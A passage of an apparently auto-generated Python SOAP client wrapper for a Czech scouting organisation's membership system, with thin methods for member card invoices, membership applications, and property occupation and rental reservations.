return self._client.service.MemberCardInvoiceUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Sequence": Sequence, "Maturity": Maturity, "DateGenerating": DateGenerating, "TotalPrice": TotalPrice, "TotalPriceWithVat": TotalPriceWithVat, "Price": Price, "PriceBase": PriceBase, "PriceFirst": PriceFirst, "PriceSecond": PriceSecond, "VatBase": VatBase, "VatFirst": VatFirst, "VatSecond": VatSecond, "ID_MemberCardInvoiceGenerate": ID_MemberCardInvoiceGenerate, "ID_InvoiceGroup": ID_InvoiceGroup, "DateTaxableSupply": DateTaxableSupply, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "StateCode": StateCode, "IC": IC, "DIC": DIC, "DisplayName": DisplayName, "ID_MemberCardInvoiceState": ID_MemberCardInvoiceState, "MemberCardInvoiceState": MemberCardInvoiceState, "InvoiceGroupContractorIC": InvoiceGroupContractorIC, "InvoiceGroupContractorDIC": InvoiceGroupContractorDIC, "InvoiceGroupContractorPhone": InvoiceGroupContractorPhone, "InvoiceGroupContractorEmail": InvoiceGroupContractorEmail, "InvoiceGroupWeb": InvoiceGroupWeb, "InvoiceGroupFileReference": InvoiceGroupFileReference, "InvoiceGroupBankAccount": InvoiceGroupBankAccount, "InvoiceGroupBankCode": InvoiceGroupBankCode, "InvoiceGroupBank": InvoiceGroupBank, "PaymentType": PaymentType, "QRCodeString": QRCodeString, "InvoiceGroupContractor": InvoiceGroupContractor, "InvoiceGroupContractorAddress": InvoiceGroupContractorAddress, "InvoiceBankAccount": InvoiceBankAccount})
# Odeslat fakturu za členské karty
def MemberCardInvoiceUpdateSend(self, ID_Login, ID, ID_Unit, Sequence, Maturity, DateGenerating, TotalPrice, TotalPriceWithVat, Price, PriceBase, PriceFirst, PriceSecond, VatBase, VatFirst, VatSecond, ID_MemberCardInvoiceGenerate, ID_InvoiceGroup, DateTaxableSupply, Unit=None, RegistrationNumber=None, Street=None, City=None, Postcode=None, State=None, StateCode=None, IC=None, DIC=None, DisplayName=None, ID_MemberCardInvoiceState=None, MemberCardInvoiceState=None, InvoiceGroupContractorIC=None, InvoiceGroupContractorDIC=None, InvoiceGroupContractorPhone=None, InvoiceGroupContractorEmail=None, InvoiceGroupWeb=None, InvoiceGroupFileReference=None, InvoiceGroupBankAccount=None, InvoiceGroupBankCode=None, InvoiceGroupBank=None, PaymentType=None, QRCodeString=None, InvoiceGroupContractor=None, InvoiceGroupContractorAddress=None, InvoiceBankAccount=None):
return self._client.service.MemberCardInvoiceUpdateSend({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Sequence": Sequence, "Maturity": Maturity, "DateGenerating": DateGenerating, "TotalPrice": TotalPrice, "TotalPriceWithVat": TotalPriceWithVat, "Price": Price, "PriceBase": PriceBase, "PriceFirst": PriceFirst, "PriceSecond": PriceSecond, "VatBase": VatBase, "VatFirst": VatFirst, "VatSecond": VatSecond, "ID_MemberCardInvoiceGenerate": ID_MemberCardInvoiceGenerate, "ID_InvoiceGroup": ID_InvoiceGroup, "DateTaxableSupply": DateTaxableSupply, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "StateCode": StateCode, "IC": IC, "DIC": DIC, "DisplayName": DisplayName, "ID_MemberCardInvoiceState": ID_MemberCardInvoiceState, "MemberCardInvoiceState": MemberCardInvoiceState, "InvoiceGroupContractorIC": InvoiceGroupContractorIC, "InvoiceGroupContractorDIC": InvoiceGroupContractorDIC, "InvoiceGroupContractorPhone": InvoiceGroupContractorPhone, "InvoiceGroupContractorEmail": InvoiceGroupContractorEmail, "InvoiceGroupWeb": InvoiceGroupWeb, "InvoiceGroupFileReference": InvoiceGroupFileReference, "InvoiceGroupBankAccount": InvoiceGroupBankAccount, "InvoiceGroupBankCode": InvoiceGroupBankCode, "InvoiceGroupBank": InvoiceGroupBank, "PaymentType": PaymentType, "QRCodeString": QRCodeString, "InvoiceGroupContractor": InvoiceGroupContractor, "InvoiceGroupContractorAddress": InvoiceGroupContractorAddress, "InvoiceBankAccount": InvoiceBankAccount})
# Načíst seznam typů členské karty
def MemberCardTypeAll(self, ID_Login, ID_Person, FilterByAge, ID=None, DisplayName=None):
return self._client.service.MemberCardTypeAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "FilterByAge": FilterByAge, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam členství osob v jednotce
def MembershipAll(self, ID_Login, ID_Unit, ID_Person, OnlyDirectMember, IsSts, ShowHistory, IsValid, ID_MembershipType=None, ID_MembershipCategory=None, LastName=None, IdentificationCode=None, ShowLowerUnits=None):
return self._client.service.MembershipAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "OnlyDirectMember": OnlyDirectMember, "IsSts": IsSts, "ShowHistory": ShowHistory, "IsValid": IsValid, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "LastName": LastName, "IdentificationCode": IdentificationCode, "ShowLowerUnits": ShowLowerUnits})
# Načíst seznam členství osob v jednotce
def MembershipDetailPersonData(self, ID_Login, ID_Person):
return self._client.service.MembershipDetailPersonData({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Načíst zjednodušený seznam členství osoby
def MembershipAllPersonList(self, ID_Login, ID_Person):
return self._client.service.MembershipAllPersonList({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Načíst seznam přihlášek bez souboru přihlášky
def MembershipApplicationAllEmptyEnroll(self, ID_Login):
return self._client.service.MembershipApplicationAllEmptyEnroll({"ID_Login": ID_Login})
# Načíst seznam přihlášek
def MembershipApplicationAll(self, ID_Login, ID, ID_Unit, ID_Person, ID_MembershipApplicationState=None, MembershipApplicationStates=None):
return self._client.service.MembershipApplicationAll({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationStates": MembershipApplicationStates})
# Načíst detail přihlášky pro sestavu
def MembershipApplicationDetailReport(self, ID_Login, ID):
return self._client.service.MembershipApplicationDetailReport({"ID_Login": ID_Login, "ID": ID})
# Načíst detail přihlášky
def MembershipApplicationDetailAccessKey(self, ID_Login, ID_Application, AccessKey):
return self._client.service.MembershipApplicationDetailAccessKey({"ID_Login": ID_Login, "ID_Application": ID_Application, "AccessKey": AccessKey})
# Načíst detail přihlášky
def MembershipApplicationDetail(self, ID_Login, ID):
return self._client.service.MembershipApplicationDetail({"ID_Login": ID_Login, "ID": ID})
# Založit přihlášku
def MembershipApplicationInsert(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
return self._client.service.MembershipApplicationInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ValidTo": ValidTo, "AccessKey": AccessKey, "IsValid": IsValid, "DateCreate": DateCreate, "LastOpened": LastOpened, "IsAdult": IsAdult, "DateFilled": DateFilled, "DateFinished": DateFinished, "Birthday": Birthday, "DateState": DateState, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "ID_Assurance": ID_Assurance, "Unit": Unit, "UnitTitle": UnitTitle, "LogoExtension": LogoExtension, "RegistrationNumber": RegistrationNumber, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationState": MembershipApplicationState, "FirstName": FirstName, "LastName": LastName, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ParentType": ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "ParentType2": ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "Person": Person, "IdentificationCode": IdentificationCode, "PhoneMainHelp": PhoneMainHelp, "PhoneMainPlaceholder": PhoneMainPlaceholder, "EmailMainHelp": EmailMainHelp, "EmailMainPlaceholder": EmailMainPlaceholder, "Reason": Reason, "ID_Sex": ID_Sex, "Sex": Sex, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "DistrictBirth": DistrictBirth, "Degrees": Degrees, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "Street": Street, "City": City, "PostalFirstLine": PostalFirstLine, "State": State, "Postcode": Postcode, "PostalStreet": PostalStreet, "PostalState": PostalState, "PostalPostcode": PostalPostcode, "PostalCity": PostalCity, "PhoneParent": PhoneParent, "EmailParent": EmailParent, "PhoneParent2": PhoneParent2, "EmailParent2": EmailParent2, "Phone": Phone, "Email": Email, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Assurance": Assurance})
# Načíst seznam stavů přihlášky
def MembershipApplicationStateAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.MembershipApplicationStateAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Generovat PDF e-přihlášky
def MembershipApplicationOtherGenerateEnroll(self, ID_Login, ID=None):
return self._client.service.MembershipApplicationOtherGenerateEnroll({"ID_Login": ID_Login, "ID": ID})
# Upravit přihlášku
def MembershipApplicationUpdateAccessKey(self, ID_Login, ID_Application, AccessKey, OnlyValidate, Birthday, IsForeign, ID_DegreeType1, ID_DegreeType2, ID_DegreeType3, ID_DistrictBirth, ID_PersonPersonParent, ID_PersonPersonParent2, ID_Assurance, CheckInfo, CheckAllowDataStorage, CheckAllowAudiovisual, CheckAllowSocialNetwork, CheckAllowMarketing, CheckCorrect, IsPostalSame, FirstName=None, LastName=None, ID_Sex=None, IdentificationCode=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Phone=None, Email=None, Note=None, MaidenName=None, ID_Citizenship=None, CitizenshipCustom=None, BirthCity=None, ID_ParentType=None, ParentTypeCustom=None, FirstNameParent=None, LastNameParent=None, EmailParent=None, PhoneParent=None, NoteParent=None, ID_ParentType2=None, ParentTypeCustom2=None, FirstNameParent2=None, LastNameParent2=None, EmailParent2=None, PhoneParent2=None, NoteParent2=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, ParentNote=None):
return self._client.service.MembershipApplicationUpdateAccessKey({"ID_Login": ID_Login, "ID_Application": ID_Application, "AccessKey": AccessKey, "OnlyValidate": OnlyValidate, "Birthday": Birthday, "IsForeign": IsForeign, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "ID_DistrictBirth": ID_DistrictBirth, "ID_PersonPersonParent": ID_PersonPersonParent, "ID_PersonPersonParent2": ID_PersonPersonParent2, "ID_Assurance": ID_Assurance, "CheckInfo": CheckInfo, "CheckAllowDataStorage": CheckAllowDataStorage, "CheckAllowAudiovisual": CheckAllowAudiovisual, "CheckAllowSocialNetwork": CheckAllowSocialNetwork, "CheckAllowMarketing": CheckAllowMarketing, "CheckCorrect": CheckCorrect, "IsPostalSame": IsPostalSame, "FirstName": FirstName, "LastName": LastName, "ID_Sex": ID_Sex, "IdentificationCode": IdentificationCode, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Phone": Phone, "Email": Email, "Note": Note, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "ID_ParentType": ID_ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "EmailParent": EmailParent, "PhoneParent": PhoneParent, "NoteParent": NoteParent, "ID_ParentType2": ID_ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "EmailParent2": EmailParent2, "PhoneParent2": PhoneParent2, "NoteParent2": NoteParent2, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "ParentNote": ParentNote})
# Dokončit přihlášku
def MembershipApplicationUpdateFinish(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
return self._client.service.MembershipApplicationUpdateFinish({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ValidTo": ValidTo, "AccessKey": AccessKey, "IsValid": IsValid, "DateCreate": DateCreate, "LastOpened": LastOpened, "IsAdult": IsAdult, "DateFilled": DateFilled, "DateFinished": DateFinished, "Birthday": Birthday, "DateState": DateState, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "ID_Assurance": ID_Assurance, "Unit": Unit, "UnitTitle": UnitTitle, "LogoExtension": LogoExtension, "RegistrationNumber": RegistrationNumber, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationState": MembershipApplicationState, "FirstName": FirstName, "LastName": LastName, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ParentType": ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "ParentType2": ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "Person": Person, "IdentificationCode": IdentificationCode, "PhoneMainHelp": PhoneMainHelp, "PhoneMainPlaceholder": PhoneMainPlaceholder, "EmailMainHelp": EmailMainHelp, "EmailMainPlaceholder": EmailMainPlaceholder, "Reason": Reason, "ID_Sex": ID_Sex, "Sex": Sex, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "DistrictBirth": DistrictBirth, "Degrees": Degrees, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "Street": Street, "City": City, "PostalFirstLine": PostalFirstLine, "State": State, "Postcode": Postcode, "PostalStreet": PostalStreet, "PostalState": PostalState, "PostalPostcode": PostalPostcode, "PostalCity": PostalCity, "PhoneParent": PhoneParent, "EmailParent": EmailParent, "PhoneParent2": PhoneParent2, "EmailParent2": EmailParent2, "Phone": Phone, "Email": Email, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Assurance": Assurance})
# Odmítnout přihlášku
def MembershipApplicationUpdateDeny(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
return self._client.service.MembershipApplicationUpdateDeny({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ValidTo": ValidTo, "AccessKey": AccessKey, "IsValid": IsValid, "DateCreate": DateCreate, "LastOpened": LastOpened, "IsAdult": IsAdult, "DateFilled": DateFilled, "DateFinished": DateFinished, "Birthday": Birthday, "DateState": DateState, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "ID_Assurance": ID_Assurance, "Unit": Unit, "UnitTitle": UnitTitle, "LogoExtension": LogoExtension, "RegistrationNumber": RegistrationNumber, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationState": MembershipApplicationState, "FirstName": FirstName, "LastName": LastName, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ParentType": ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "ParentType2": ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "Person": Person, "IdentificationCode": IdentificationCode, "PhoneMainHelp": PhoneMainHelp, "PhoneMainPlaceholder": PhoneMainPlaceholder, "EmailMainHelp": EmailMainHelp, "EmailMainPlaceholder": EmailMainPlaceholder, "Reason": Reason, "ID_Sex": ID_Sex, "Sex": Sex, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "DistrictBirth": DistrictBirth, "Degrees": Degrees, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "Street": Street, "City": City, "PostalFirstLine": PostalFirstLine, "State": State, "Postcode": Postcode, "PostalStreet": PostalStreet, "PostalState": PostalState, "PostalPostcode": PostalPostcode, "PostalCity": PostalCity, "PhoneParent": PhoneParent, "EmailParent": EmailParent, "PhoneParent2": PhoneParent2, "EmailParent2": EmailParent2, "Phone": Phone, "Email": Email, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Assurance": Assurance})
# Upravit přihlášku
def MembershipApplicationUpdate(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
return self._client.service.MembershipApplicationUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ValidTo": ValidTo, "AccessKey": AccessKey, "IsValid": IsValid, "DateCreate": DateCreate, "LastOpened": LastOpened, "IsAdult": IsAdult, "DateFilled": DateFilled, "DateFinished": DateFinished, "Birthday": Birthday, "DateState": DateState, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "ID_Assurance": ID_Assurance, "Unit": Unit, "UnitTitle": UnitTitle, "LogoExtension": LogoExtension, "RegistrationNumber": RegistrationNumber, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationState": MembershipApplicationState, "FirstName": FirstName, "LastName": LastName, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ParentType": ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "ParentType2": ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "Person": Person, "IdentificationCode": IdentificationCode, "PhoneMainHelp": PhoneMainHelp, "PhoneMainPlaceholder": PhoneMainPlaceholder, "EmailMainHelp": EmailMainHelp, "EmailMainPlaceholder": EmailMainPlaceholder, "Reason": Reason, "ID_Sex": ID_Sex, "Sex": Sex, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "DistrictBirth": DistrictBirth, "Degrees": Degrees, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "Street": Street, "City": City, "PostalFirstLine": PostalFirstLine, "State": State, "Postcode": Postcode, "PostalStreet": PostalStreet, "PostalState": PostalState, "PostalPostcode": PostalPostcode, "PostalCity": PostalCity, "PhoneParent": PhoneParent, "EmailParent": EmailParent, "PhoneParent2": PhoneParent2, "EmailParent2": EmailParent2, "Phone": Phone, "Email": Email, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Assurance": Assurance})
# Načíst pozice užívání nemovistostí v dane oblasti
def OccupationAllPositions(self, ID_Login, ID_Application, GpsLatitudeStart, GpsLongitudeStart, GpsLatitudeEnd, GpsLongitudeEnd, ID_Unit, IncludeChildUnits, Publish, ID_RealtyType, GpsLatitude, GpsLongitude, Distance, AdvertisingCategories=None):
return self._client.service.OccupationAllPositions({"ID_Login": ID_Login, "ID_Application": ID_Application, "GpsLatitudeStart": GpsLatitudeStart, "GpsLongitudeStart": GpsLongitudeStart, "GpsLatitudeEnd": GpsLatitudeEnd, "GpsLongitudeEnd": GpsLongitudeEnd, "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits, "Publish": Publish, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "Distance": Distance, "AdvertisingCategories": AdvertisingCategories})
# Načíst seznam užívání nemovitosti
def OccupationAllUnit(self, ID_Login, ID_Unit, IsActive):
return self._client.service.OccupationAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsActive": IsActive})
# Smazat užívání nemovitosti
def OccupationDeleteRealty(self, ID_Login, ID):
return self._client.service.OccupationDeleteRealty({"ID_Login": ID_Login, "ID": ID})
# Načíst užívání nemovistostí ze sloučené oblasti
def OccupationAllGrouped(self, ID, ID_Unit, IncludeChildUnits, Publish, ID_RealtyType, GpsLatitude, GpsLongitude, Distance, ID_Login, ID_Application, AdvertisingCategories=None):
return self._client.service.OccupationAllGrouped({"ID": ID, "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits, "Publish": Publish, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "Distance": Distance, "ID_Login": ID_Login, "ID_Application": ID_Application, "AdvertisingCategories": AdvertisingCategories})
# Načíst detail užívání nemovitosti
def OccupationDetailRealtyDownload(self, ID_Login, ID, ID_Unit, ID_Realty, Publish, ID_RealtyType, Note=None, RealtyType=None):
return self._client.service.OccupationDetailRealtyDownload({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Realty": ID_Realty, "Publish": Publish, "ID_RealtyType": ID_RealtyType, "Note": Note, "RealtyType": RealtyType})
# Načíst detail užívání nemovitosti
def OccupationDetailRealty(self, ID_Login, ID, ID_Application):
return self._client.service.OccupationDetailRealty({"ID_Login": ID_Login, "ID": ID, "ID_Application": ID_Application})
# Načíst seznam vybavení
def OccupationEquipmentAll(self, ID_Login, ID_Application, ID, ID_RealtyType, DisplayName=None):
return self._client.service.OccupationEquipmentAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ID_RealtyType": ID_RealtyType, "DisplayName": DisplayName})
# Načíst seznam uživatelem spravovaných půjčitelných jednotek
def OccupationRentAllBorrowable(self, ID_Login):
return self._client.service.OccupationRentAllBorrowable({"ID_Login": ID_Login})
# Načíst seznam půjčitelných jednotek
def OccupationRentAllPublic(self, ID_Application, ID_Login, BasePrice, ScoutPrice, ChildPrice, ID_Occupation, OccupationLanguageList=None, PriceTypeList=None):
return self._client.service.OccupationRentAllPublic({"ID_Application": ID_Application, "ID_Login": ID_Login, "BasePrice": BasePrice, "ScoutPrice": ScoutPrice, "ChildPrice": ChildPrice, "ID_Occupation": ID_Occupation, "OccupationLanguageList": OccupationLanguageList, "PriceTypeList": PriceTypeList})
# Načíst detail půjčitelné jednotky
def OccupationRentDetailPublic(self, ID_Application, ID, ID_Login):
return self._client.service.OccupationRentDetailPublic({"ID_Application": ID_Application, "ID": ID, "ID_Login": ID_Login})
# Načíst seznam rezervací půjčitelné jednotky pro kalendář
def OccupationRentReservationAllCalendar(self, ID_Login, ID_Application, ID, ShowAdminView, CalendarName=None, CalendarDescription=None):
return self._client.service.OccupationRentReservationAllCalendar({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ShowAdminView": ShowAdminView, "CalendarName": CalendarName, "CalendarDescription": CalendarDescription})
# Načíst seznam rezervací
def OccupationRentReservationAllOverview(self, ID_Login, ID_OccupationRent, ID, ID_User, ID_OccupationRentReservationState=None):
